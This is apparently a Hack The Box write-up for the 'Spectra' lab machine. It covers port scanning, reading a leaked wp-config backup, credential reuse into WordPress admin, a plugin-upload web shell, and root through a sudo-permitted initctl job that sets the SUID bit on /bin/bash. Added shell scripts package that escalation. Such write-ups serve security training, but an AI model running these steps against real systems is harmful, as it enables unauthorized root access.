Basic information

Port scan

22,80,3306,8081:

$ nmap -sC -sV 10.10.10.229
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-01 15:07 CST
Nmap scan report for 10.10.10.229
Host is up (0.078s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
|_ 4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA)
80/tcp open http nginx 1.17.4
|_http-server-header: nginx/1.17.4
|_http-title: Site doesn't have a title (text/html).
3306/tcp open mysql MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
8081/tcp open blackice-icecap?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Mon, 01 Mar 2021 07:08:23 GMT
| Connection: close
| Hello World
| GetRequest:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Mon, 01 Mar 2021 07:08:22 GMT
| Connection: close
| Hello World
| HTTPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Mon, 01 Mar 2021 07:08:30 GMT
| Connection: close
|_ Hello World
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8081-TCP:V=7.91%I=7%D=3/1%Time=603C92E7%P=x86_64-apple-darwin19.6.0
SF:%r(GetRequest,71,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/plain
SF:\r\nDate:\x20Mon,\x2001\x20Mar\x202021\x2007:08:22\x20GMT\r\nConnection
SF::\x20close\r\n\r\nHello\x20World\n")%r(FourOhFourRequest,71,"HTTP/1\.1\
SF:x20200\x20OK\r\nContent-Type:\x20text/plain\r\nDate:\x20Mon,\x2001\x20M
SF:ar\x202021\x2007:08:23\x20GMT\r\nConnection:\x20close\r\n\r\nHello\x20W
SF:orld\n")%r(HTTPOptions,71,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20t
SF:ext/plain\r\nDate:\x20Mon,\x2001\x20Mar\x202021\x2007:08:30\x20GMT\r\nC
SF:onnection:\x20close\r\n\r\nHello\x20World\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.25 seconds

80

Port 80 serves an issue-tracking page with two links; first add the hosts entry:

10.10.10.229 spectra.htb

8081

Just a hello world (the same text/plain "Hello World" body nmap saw for every probe):

spectra.htb

testing

The testing link returns a database error:

main

The main link is a WordPress site, and the posts give us a username:

Directory listing

Requesting the testing directory directly gives a directory listing. Among the files is a wp-config.php.save backup, which reveals the database configuration in plain text (the .save copy is served as-is because nginx does not hand it to PHP):

define( 'DB_NAME', 'dev' );

/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );

wordpress

Combine the WordPress username from the posts with the database password and log in to wp-admin (the password was reused):

administrator:devteam01

getshell

Get a shell either manually by uploading a plugin or directly with msf (wp_admin_shell_upload):

A quick look around: under /opt there is a job configuration file that reads a password file from a fixed set of directories. Reading the password file from the directory it names gives a password, and listing /home gives the usernames to try it against:

SummerHereWeCome!!

ls /home
chronos
katie
nginx
root
user

/opt/autologin.conf.orig

# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

description "Automatic login at boot"
author "chromium-os-dev@chromium.org"

# After boot-complete starts, the login prompt is visible and is accepting
# input.
start on started boot-complete

script
  passwd=
  # Read password from file. The file may optionally end with a newline.
  for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do
    if [ -e "${dir}/passwd" ]; then
      passwd="$(cat "${dir}/passwd")"
      break
    fi
  done

  if [ -z "${passwd}" ]; then
    exit 0
  fi

  # Inject keys into the login prompt.
  #
  # For this to work, you must have already created an account on the device.
  # Otherwise, no login prompt appears at boot and the injected keys do the
  # wrong thing.
  /usr/local/sbin/inject-keys.py -s "${passwd}" -k enter
end script
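The lookup the job performs, as an added shell example that is not part of the original writeup: the search order and the "optional trailing newline" handling are reproduced as functions that take the directory list as arguments, so they can be exercised against throwaway directories and then pointed at the job's real search path on the box. The function names and the AUTOLOGIN_DIRS variable are assumptions made here; the directories inside it are the two the job itself names.

```sh
#!/bin/sh
# Added example, not the writeup's own commands. Reproduces the password
# lookup in /opt/autologin.conf.orig so its behaviour can be checked.

# Search order used by the real job on the box (assumed variable name).
AUTOLOGIN_DIRS="/mnt/stateful_partition/etc/autologin /etc/autologin"

# find_autologin_passwd DIR... : print the password the job would inject,
# i.e. the contents of the first DIR/passwd that exists, with the trailing
# newline stripped exactly as the job's "$(cat ...)" strips it.
# Returns 1 when no directory holds a passwd file (the job then exits 0
# without typing anything).
find_autologin_passwd() {
    for dir in "$@"; do
        if [ -e "${dir}/passwd" ]; then
            printf '%s\n' "$(cat "${dir}/passwd")"
            return 0
        fi
    done
    return 1
}

# autologin_passwd_readable DIR... : the actual finding on this box. Stops at
# the first passwd file that exists (the one the job would use) and exits 0
# only if the current, low-privileged user can read it; prints its path.
autologin_passwd_readable() {
    for dir in "$@"; do
        if [ -e "${dir}/passwd" ]; then
            if [ -r "${dir}/passwd" ]; then
                printf '%s\n' "${dir}/passwd"
                return 0
            fi
            return 1
        fi
    done
    return 1
}

# Usage on the target, from the web shell user:
#   find_autologin_passwd $AUTOLOGIN_DIRS
#   autologin_passwd_readable $AUTOLOGIN_DIRS && echo "autologin password readable"
```

Because the job reads the file with `cat` and injects it as keystrokes, the password has to sit on disk in clear text and the stateful-partition copy wins over /etc/autologin if both exist; that is why checking the first existing file, not every file, tells you what the login prompt will receive.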

user flag

Then SSH in as katie with the recovered password and grab the user flag:

Privilege escalation information

sudo -l shows /sbin/initctl. Since initctl is the Upstart control tool and Upstart runs jobs as root, we can write our own job configuration under /etc/init and have initctl execute it:

Privilege escalation && root flag

Write a job file whose script block sets the SUID bit on bash, start it with initctl, then run bash -p (remember to remove the bit afterwards):

root flag

Then read root.txt from the root directory:

/etc/init/test.conf

script
    chmod +s /bin/bash
end script
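The same escalation as an added shell example (not the writeup's own commands), with the verification and revert steps that belong to it: write the job, start it through the sudo-allowed initctl, confirm the setuid bit landed before trusting it, drop into bash -p, and clean up. The job directory and name default to the writeup's /etc/init/test.conf; the function names, the JOB_DIR/JOB_NAME variables and the description line are assumptions made here.

```sh
#!/bin/sh
# Added example, not the writeup's own commands.

JOB_DIR="${JOB_DIR:-/etc/init}"   # assumed variable; /etc/init as in the writeup
JOB_NAME="${JOB_NAME:-test}"      # assumed variable; "test" as in the writeup

# write_suid_job DIR NAME : write an Upstart job whose script block sets the
# setuid/setgid bits on /bin/bash. The script runs as root because Upstart
# itself runs as root; sudo only has to permit /sbin/initctl.
write_suid_job() {
    dir="$1"; name="$2"
    cat > "${dir}/${name}.conf" <<'EOF'
description "suid bash via initctl"
script
    chmod +s /bin/bash
end script
EOF
}

# is_suid FILE : exit 0 when FILE carries the setuid bit. This is the check
# to run after "initctl start" and before assuming the job actually ran.
is_suid() { [ -u "$1" ]; }

# Full sequence on the target, as the user that may sudo initctl.
run_privesc() {
    write_suid_job "$JOB_DIR" "$JOB_NAME"
    sudo /sbin/initctl start "$JOB_NAME"
    is_suid /bin/bash || { echo "setuid bit not set on /bin/bash" >&2; return 1; }
    # -p keeps the effective uid 0 granted by the setuid bit instead of
    # dropping it back to the real uid.
    /bin/bash -p
}

# Revert from the root shell: clear the bits and remove the job file.
revert_suid_bash() {
    chmod -s /bin/bash
    rm -f "${JOB_DIR}/${JOB_NAME}.conf"
}
```

Without `-p`, bash notices that the effective and real uids differ and drops the privilege on startup, so a successful chmod still looks like a normal katie shell; the `is_suid` check separates "the job never ran" from "the job ran but I launched bash wrong".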

References